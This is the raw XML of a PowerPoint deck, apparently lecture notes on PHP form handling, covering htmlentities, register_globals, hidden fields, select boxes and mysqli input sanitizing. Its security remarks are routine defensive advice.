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440" r:id="rId2"/>
    <p:sldId id="441" r:id="rId3"/>
    <p:sldId id="442" r:id="rId4"/>
    <p:sldId id="443" r:id="rId5"/>
    <p:sldId id="445" r:id="rId6"/>
    <p:sldId id="446" r:id="rId7"/>
    <p:sldId id="447" r:id="rId8"/>
    <p:sldId id="448" r:id="rId9"/>
    <p:sldId id="449" r:id="rId10"/>
    <p:sldId id="450" r:id="rId11"/>
    <p:sldId id="451" r:id="rId12"/>
    <p:sldId id="453" r:id="rId13"/>
    <p:sldId id="454" r:id="rId14"/>
    <p:sldId id="456" r:id="rId15"/>
    <p:sldId id="457" r:id="rId16"/>
    <p:sldId id="460" r:id="rId17"/>
    <p:sldId id="461" r:id="rId18"/>
    <p:sldId id="462" r:id="rId19"/>
    <p:sldId id="472" r:id="rId20"/>
    <p:sldId id="464" r:id="rId21"/>
    <p:sldId id="465" r:id="rId22"/>
    <p:sldId id="466" r:id="rId23"/>
    <p:sldId id="473" r:id="rId24"/>
    <p:sldId id="467" r:id="rId25"/>
    <p:sldId id="474" r:id="rId26"/>
    <p:sldId id="475" r:id="rId27"/>
    <p:sldId id="468" r:id="rId28"/>
    <p:sldId id="469" r:id="rId29"/>
    <p:sldId id="476" r:id="rId30"/>
    <p:sldId id="477" r:id="rId31"/>
    <p:sldId id="478" r:id="rId32"/>
    <p:sldId id="479" r:id="rId33"/>
    <p:sldId id="483" r:id="rId34"/>
    <p:sldId id="480" r:id="rId35"/>
    <p:sldId id="481" r:id="rId36"/>
    <p:sldId id="482" r:id="rId37"/>
    <p:sldId id="484" r:id="rId38"/>
    <p:sldId id="48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83" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="65" d="100"/>
          <a:sy n="65" d="100"/>
        </p:scale>
        <p:origin x="9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95293-54DB-4A5C-96B4-E1F5A10E37A7}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/5/2017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4A6D1-42E9-4464-9ADE-EF6BC12DC145}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4210164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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>strips out all HTML markup codes and replaces them with a form that displays the characters, but does not allow a browser to act on them</a:t>
            </a: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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1998273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how the &lt;input&gt; elements in this example do not use the /&gt; form of self-closing, because in the new world of HTML5 this style is optional (and it was never actually required in HTML4 anyway; it was recommended purely because XHTML was planned to supersede HTML at some point—but this never happened)</a:t>
            </a:r>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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1199905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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3704286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ever find yourself maintaining code that seems to assume values for certain variables for no apparent reason, you can make an educated guess that the programmer probably wrote the code using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>register_globals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and that these values are intended to be extracted from a Post or Get. If so, I recommend that you rewrite the code to load these variables explicitly from the correct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$_POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$_GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>array.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E0A4A6D1-42E9-4464-9ADE-EF6BC12DC145}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3199898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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3535507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Default values are also used for hidden fields if you want to pass extra information from your web page to your program, in addition to what users enter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E0A4A6D1-42E9-4464-9ADE-EF6BC12DC145}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2626302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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2338139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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1488382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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189640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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3579799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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1652046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use either of these functions, you must already have an active connection object open to a MySQL database.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E0A4A6D1-42E9-4464-9ADE-EF6BC12DC145}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="903082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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="748781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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3226194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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4258293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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1515801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Radio buttons are named after the push-in preset buttons found on many older radios, where any previously depressed button pops back up when another is pressed.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E0A4A6D1-42E9-4464-9ADE-EF6BC12DC145}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32652881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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1982269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Hidden fields can also be useful for storing other details, such as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>session ID string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that you might create to identify a user, and so on.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Never treat hidden fields as secure—because they are not. Someone could easily view the HTML containing them by using a browser’s View Source feature.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33928681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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19315519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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13043829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recommend against multiple select boxes smaller than two rows in height—some browsers may not correctly display the scroll bars needed to access it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can also use the selected attribute within a multiple select and can, in fact, have more than one option preselected if you wish.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E0A4A6D1-42E9-4464-9ADE-EF6BC12DC145}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2359722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integer is returned in $rows. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E0A4A6D1-42E9-4464-9ADE-EF6BC12DC145}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33243542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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26335280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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30833323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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29395909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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1161642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Remember that rows can also be returned as associative arrays or as both types, depending on the value passed in the second argument.</a:t>
            </a:r>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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3438524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Sanitizing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>If you are using the procedural version of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> extension, you will need to modify the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sanitizeMySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> function to call the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>mysqli_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> function, like this (in which case $connection will then be a handle, not an object): $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>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mysqli_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>($connection, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3169510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the HTML5 specification has further improved the use of forms.</a:t>
            </a:r>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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4025912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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="973723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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1776776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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="229162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28A0-DDF5-4DFB-B688-74F210B62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A7AC83-183B-4920-816C-CBE3300C1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E3531-ECF2-4AF2-B7E4-12F1744276CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2F0DC048-CB74-4FD9-B049-A704A1399802}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0071B75F-7D54-4F73-8F91-6AFEBB96D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CACB1-D3A5-4B7E-86F3-9EBA67144CC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20298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896E-634B-475F-B4F8-BFE52A85B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2C4286-690F-45BB-AE44-43D47CAD1E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D4A2F-CB68-470C-BAD3-B5C23C2567B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2F0DC048-CB74-4FD9-B049-A704A1399802}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FABDBC0-BA75-47E7-8BF1-0360BDBB9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769A2-B656-406F-95A0-905152EC9ED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3113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D928F-DFFD-4B17-95EF-9DF947581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CDC893-A5DD-4A5E-9D14-B76D71BFD7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321AE-9B87-42A3-B260-A02B02AFFAAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2F0DC048-CB74-4FD9-B049-A704A1399802}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C26C8F35-0C25-4CD6-9B49-F9582EC58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23E1-9037-4793-BE3D-ABAC59ACBFA8}"/>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1798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B44C-94C2-45BD-B83C-0F6C6404D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69C29F-75BB-49CF-976F-393013676E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6F82B-1CE3-4D4A-9D59-2E64A3FE15ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2F0DC048-CB74-4FD9-B049-A704A1399802}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
